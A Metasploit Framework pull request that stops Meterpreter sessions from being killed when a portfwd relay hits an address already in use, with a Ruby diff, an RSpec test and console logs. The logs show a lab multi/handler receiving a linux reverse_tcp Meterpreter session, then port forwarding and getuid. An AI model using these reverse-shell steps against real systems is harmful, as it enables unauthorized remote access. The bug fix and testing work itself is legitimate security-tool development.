### PR TITLE
Fix meterpereter being killed when Rex::AddressInUse is raised

### DIFF
--- a/lib/rex/post/meterpreter/ui/console.rb
+++ b/lib/rex/post/meterpreter/ui/console.rb
@@ -106,6 +106,8 @@ class Console
       log_error("Operation timed out.")
     rescue RequestError => info
       log_error(info.to_s)
+    rescue Rex::AddressInUse => e
+      log_error(e.message)
     rescue ::Errno::EPIPE, ::OpenSSL::SSL::SSLError, ::IOError
       self.client.kill
     rescue  ::Exception => e

--- a/spec/lib/rex/post/meterpreter/ui/console.rb
+++ b/spec/lib/rex/post/meterpreter/ui/console.rb
@@ -1,0 +1,27 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/post/meterpreter/ui/console'
+
+describe Rex::Post::Meterpreter::Ui::Console do
+
+  subject(:console) do
+    Rex::Post::Meterpreter::Ui::Console.new(nil)
+  end
+
+  describe "#run_command" do
+    let(:dispatcher) do
+      double
+    end
+
+    it "logs error when Rex::AddressInUse is raised" do
+      allow(dispatcher).to receive(:cmd_address_in_use) do
+        raise Rex::AddressInUse, "0.0.0.0:80"
+      end
+
+      expect(subject).to receive(:log_error).with("The address is already in use (0.0.0.0:80).")
+      subject.run_command(dispatcher, "address_in_use", nil)
+    end
+  end
+
+end


### PR DESCRIPTION
While trying to reproduce https://dev.metasploit.com/redmine/issues/8697, noticed which portfwd will silently kill a linux meterpreter session if two relays are installed in the same local address. From master:

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1241088 bytes) to 172.16.158.188
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.188:55753) at 2014-07-15 10:54:54 -0500

meterpreter > portfwd add -l 9000 -p 9001 -r 127.0.0.1
[*] Local TCP relay created: 0.0.0.0:9000 <-> 127.0.0.1:9001
meterpreter > portfwd add -l 9000 -p 9001 -r 127.0.0.1

[*] 172.16.158.188 - Meterpreter session 1 closed.
```

While I don't think it's the behavior identified in https://dev.metasploit.com/redmine/issues/8697, definitely should be fixed to avoid meterpreter sessions closing. The problem here is when using portfwd tries to `Rex::Services::LoadRelay#start_tcp_relay` on a busy address/port. In this case `Rex::Socket.create_tcp_server` will raise an `Rex::AddressInUse` (which is an `::IOError`). 

The exception will reach `Rex::Post::Meterpreter::Ui::Console#run_command`, where the session is being killed:

``` ruby
    rescue ::Errno::EPIPE, ::OpenSSL::SSL::SSLError, ::IOError
      self.client.kill
```

This pull request logs the error when `Rex::AddressInUse` is raised by a meterpreter command, instead of killing the session. It also rspecs the case this pull request tries to patch.
## Verification
- [x] Run the spec, verify it passes:

```
$ rspec spec/lib/rex/post/meterpreter/ui/console.rb
Rex::Post::Meterpreter::Ui::Console .

Finished in 1.04 seconds
1 example, 0 failures
Coverage report generated for RSpec to /Users/jvazquez/Projects/Code/metasploit-framework/coverage. 15631 / 91201 LOC (17.14%) covered.
```
- [x] Run the console, use `exploit/multi/handler` to get a linux meterpreter session:

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.
lhost => 172.16.158.
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1241088 bytes) to 172.16.158.188
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.188:55763) at 2014-07-15 13:13:42 -0500

meterpreter >
```
- [x] Run portfwd two times with the same local address and port, verify which a log is shown, but the session isn't closed.

```
meterpreter > portfwd add -l 8000 -p 8001 -r 127.0.0.1
[*] Local TCP relay created: 0.0.0.0:8000 <-> 127.0.0.1:8001
meterpreter > portfwd add -l 8000 -p 8001 -r 127.0.0.1
[-] The address is already in use (0.0.0.0:8000).
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
```
